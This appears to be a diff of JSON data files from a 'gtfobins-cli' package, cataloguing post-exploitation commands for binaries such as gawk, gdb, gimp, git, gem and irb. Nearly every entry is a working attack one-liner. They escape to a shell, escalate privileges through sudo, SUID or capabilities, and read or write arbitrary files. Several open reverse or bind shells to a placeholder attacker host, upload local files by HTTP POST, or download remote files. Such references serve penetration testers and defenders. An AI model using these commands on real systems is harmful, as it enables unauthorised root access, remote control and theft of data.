gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/gawk.json

@@ -0,0 +1,46 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "gawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "gawk 'BEGIN {\n    s = \"/inet/tcp/0/[host]/[port]\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc target.com 12345' on the attacker box to connect to the shell.",
+        "code": "gawk 'BEGIN {\n    s = \"/inet/tcp/[port]/0/0\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "gawk 'BEGIN { print \"DATA\" > \"[file]\" }'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "gawk '//' [file]\n"
+      }
+    ],
+      "suid": [
+      {
+        "code": "./gawk '//' \"[file]\""
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo gawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./gawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ]
+  }
+}

gtfo/data/gcc.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "gcc -x c -E \"[file]\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "gcc -xc /dev/null -o [file]\n"
+      }
+    ],
+    "shell": [
+      {
+        "code": "gcc -wrapper /bin/sh,-s ."
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo gcc -wrapper /bin/sh,-s ."
+      }
+    ]
+  }
+}

gtfo/data/gdb.json

@@ -0,0 +1,66 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "gdb -nx -ex '!sh' -ex quit"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "This requires that GDB is compiled with Python support. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "gdb -nx -ex 'python import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' -ex quit\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "This requires that GDB is compiled with Python support. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\",).read()}).encode()))' -ex quit\n"
+      },
+      {
+        "description": "This requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.",
+        "code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.",
+        "code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\",)' -ex quit\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "gdb -nx -ex \"dump value [file] \\\"DATA\\\"\" -ex quit\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "gdb -nx -ex 'python print(open(\"[file]\").read())' -ex quit"
+      }
+    ],
+    "library-load": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' -ex quit"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "./gdb -nx -ex 'python import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")' -ex quit"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo gdb -nx -ex '!sh' -ex quit"
+      }
+    ],
+    "capabilities": [
+      {
+        "description": "This requires that GDB is compiled with Python support.",
+        "code": "./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit"
+      }
+    ]
+  }
+}

gtfo/data/gem.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This requires the name of an installed gem to be provided ('rdoc' is usually installed).",
+        "code": "gem open -e \"/bin/sh -c /bin/sh\" rdoc"
+      },
+      {
+        "description": "This invokes the default editor, which is likely to be 'vi', other functions may apply. This requires the name of an installed gem to be provided ('rdoc' is usually installed).",
+        "code": "gem open rdoc\n:!/bin/sh\n"
+      },
+      {
+        "description": "This executes the specified file as 'ruby' code.",
+        "code": "TF=$(mktemp -d)\necho 'system(\"/bin/sh\")' > $TF/x\ngem build $TF/x\n"
+      },
+      {
+        "description": "This executes the specified file as 'ruby' code.",
+        "code": "TF=$(mktemp -d)\necho 'system(\"/bin/sh\")' > $TF/x\ngem install --file $TF/x\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This requires the name of an installed gem to be provided ('rdoc' is usually installed).",
+        "code": "sudo gem open -e \"/bin/sh -c /bin/sh\" rdoc"
+      }
+    ]
+  }
+}

gtfo/data/genisoimage.json

@@ -0,0 +1,15 @@
+{
+  "description": "The output is placed inside the ISO9660 file system binary format thus it may not be suitable for binary content as is, yet it can be mounted or extracted with tools like '7z'.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "genisoimage -q -o - \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo genisoimage -q -o - \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/ghc.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ghc -e 'System.Process.callCommand \"/bin/sh\"'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ghc -e 'System.Process.callCommand \"/bin/sh\"'"
+      }
+    ]
+  }
+}

gtfo/data/ghci.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ghci\nSystem.Process.callCommand \"/bin/sh\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ghci\nSystem.Process.callCommand \"/bin/sh\"\n"
+      }
+    ]
+  }
+}

gtfo/data/gimp.json

@@ -0,0 +1,57 @@
+{
+  "description": "The binary hangs after executing the Python code and can be terminated pressing 'ctrl-c'.",
+  "functions": {
+    "shell": [
+      {
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\", [port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))'\n"
+      },
+      {
+        "description": "Serve files in the local folder running an HTTP server.",
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'open(\"[file]\", \"wb\").write(\"DATA\")'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'print(open(\"[file]\").read())'"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")'"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/git.json

@@ -0,0 +1,55 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "PAGER='sh -c \"exec sh 0<&1\"' git -p help"
+      },
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "git help config\n!/bin/sh\n"
+      },
+      {
+        "description": "The help system can also be reached from any 'git' command, e.g., 'git branch'. This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "git branch --help config\n!/bin/sh\n"
+      },
+      {
+        "description": "Git hooks are merely shell scripts and in the following example the hook associated to the 'pre-commit' action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the '-C' option.",
+        "code": "TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\ngit -C \"$TF\" commit --allow-empty -m x\n"
+      },
+      {
+        "code": "TF=$(mktemp -d)\nln -s /bin/sh \"$TF/git-x\"\ngit \"--exec-path=$TF\" x\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The read file content is displayed in 'diff' style output format.",
+        "code": "git diff /dev/null [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo PAGER='sh -c \"exec sh 0<&1\"' git -p help"
+      },
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo git -p help config\n!/bin/sh\n"
+      },
+      {
+        "description": "The help system can also be reached from any 'git' command, e.g., 'git branch'. This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo git branch --help config\n!/bin/sh\n"
+      },
+      {
+        "description": "Git hooks are merely shell scripts and in the following example the hook associated to the 'pre-commit' action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the '-C' option.",
+        "code": "TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\nsudo git -C \"$TF\" commit --allow-empty -m x\n"
+      },
+      {
+        "code": "TF=$(mktemp -d)\nln -s /bin/sh \"$TF/git-x\"\nsudo git \"--exec-path=$TF\" x\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "PAGER='sh -c \"exec sh 0<&1\"' ./git -p help"
+      }
+    ]
+  }
+}

gtfo/data/grep.json

@@ -0,0 +1,20 @@
+{
+  "description": "There are many 'grep' flavors that in many cases are just copies, symlinks or wrappers around the original binary that may share the same behavior, for example: 'egrep', 'fgrep', 'zgrep', etc.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "grep '' [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./grep '' [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo grep '' [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/gtester.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp)\necho '#!/bin/sh' > $TF\necho 'exec /bin/sh -p 0<&1' >> $TF\nchmod +x $TF\ngtester -q $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho '#!/bin/sh' > $TF\necho 'exec /bin/sh 0<&1' >> $TF\nchmod +x $TF\nsudo gtester -q $TF\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "TF=$(mktemp)\necho '#!/bin/sh -p' > $TF\necho 'exec /bin/sh -p 0<&1' >> $TF\nchmod +x $TF\nsudo gtester -q $TF\n"
+      }
+    ]
+  }
+}

gtfo/data/gzip.json

@@ -0,0 +1,23 @@
+{
+  "description": "There are also a number of other utilities that rely on 'gzip' under the hood, e.g., 'zless', 'zcat', 'gunzip', etc. Besides having similar features, they also allow privileged reads if 'gzip' itself is SUID.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "gzip -f [file] -t\n"
+      },
+      {
+        "code": "gzip -c [file] | gzip -d\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./gzip -f [file] -t\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo gzip -f [file] -t\n"
+      }
+    ]
+  }
+}

gtfo/data/hd.json

@@ -0,0 +1,20 @@
+{
+  "description": "The output is a hex dump.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "hd \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./hd \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo hd \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/head.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "head -c1G [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./head -c1G [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo head -c1G [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/hexdump.json

@@ -0,0 +1,20 @@
+{
+  "description": "The output is a hex dump.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "hexdump -C \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./hexdump -C \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo hexdump -C \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/highlight.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "highlight --no-doc --failsafe \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./highlight --no-doc --failsafe \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo highlight --no-doc --failsafe \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/hping3.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "hping3\n/bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./hping3\n/bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo hping3\n/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/iconv.json

@@ -0,0 +1,25 @@
+{
+  "description": "The '8859_1' encoding is used as it accepts any single-byte sequence, thus it allows to read/write arbitrary files. Other encoding combinations may corrupt the result.",
+  "functions": {
+    "file-write": [
+      {
+        "code": "echo \"DATA\" | iconv -f 8859_1 -t 8859_1 -o \"[file]\"\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "iconv -f 8859_1 -t 8859_1 \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./iconv -f 8859_1 -t 8859_1 \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "./iconv -f 8859_1 -t 8859_1 \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/iftop.json

@@ -0,0 +1,20 @@
+{
+  "description": "This requires 'iftop' 0.17 and the privilege to capture on some device (specify with '-i' if needed) .",
+  "functions": {
+    "shell": [
+      {
+        "code": "iftop\n!/bin/sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./iftop\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo iftop\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/install.json

@@ -0,0 +1,15 @@
+{
+  "description": "This can be run with elevated privileges to change permissions ('6' denotes the SUID bits) and then read, write, or execute a copy of the file.",
+  "functions": {
+    "suid": [
+      {
+        "code": "TF=$(mktemp)\n./install -m 6777 [file] $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\nsudo install -m 6777 [file] $TF\n"
+      }
+    ]
+  }
+}

gtfo/data/ionice.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ionice /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ionice /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ionice /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/ip.json

@@ -0,0 +1,28 @@
+{
+  "description": "The read file content is corrupted by error prints.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "ip -force -batch [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ip -force -batch [file]\n"
+      },
+      {
+        "description": "This only works for Linux with CONFIG_NET_NS=y.",
+        "code": "./ip netns add foo\n./ip netns exec foo /bin/sh -p\n./ip netns delete foo\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ip -force -batch [file]\n"
+      },
+      {
+        "description": "This only works for Linux with CONFIG_NET_NS=y.",
+        "code": "sudo ip netns add foo\nsudo ip netns exec foo /bin/sh\nsudo ip netns delete foo\n"
+      }
+    ]
+  }
+}

gtfo/data/irb.json

@@ -0,0 +1,47 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "irb\nexec '/bin/bash'\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "irb\nrequire 'socket'; exit if fork;c=TCPSocket.new('[host]', [port]);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read} end\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Serve files in the local folder running an HTTP server on port [port].",
+        "code": "irb\nrequire 'webrick'; WEBrick::HTTPServer.new(:Port => [port], :DocumentRoot => Dir.pwd).start;\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "irb\nrequire 'open-uri'; IO.copy_stream(open('[url]'), '[file]')\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "irb\nFile.open(\"[file]\", \"w+\") { |f| f.write(\"DATA\") }\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "irb\nputs File.read(\"[file]\")\n"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "irb\nrequire \"fiddle\"; Fiddle.dlopen(\"lib.so\")\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo irb\nexec '/bin/bash'\n"
+      }
+    ]
+  }
+}